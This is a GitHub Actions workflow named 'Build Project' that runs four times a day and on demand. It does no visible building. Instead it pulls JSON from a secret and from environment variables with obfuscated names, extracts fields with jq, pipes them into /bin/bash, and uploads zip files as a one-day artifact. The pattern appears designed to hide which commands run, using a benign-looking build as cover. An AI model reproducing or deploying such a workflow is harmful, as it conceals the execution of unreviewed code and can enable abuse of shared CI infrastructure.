name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '47 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  service:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run
        env:
          g85332: ${{ secrets.g85332 }}
        run: |
          printf '%s' "$g85332" | jq -r .j0 | /bin/bash
          echo $xnjxs92 | jq -r .i90393 | /bin/bash
          echo $i937 | jq -r .bpkv754 | /bin/bash

      - name: Save archive
        uses: actions/upload-artifact@v4
        with:
          name: pVDMKkiX
          path: "*.zip"
          retention-days: 1
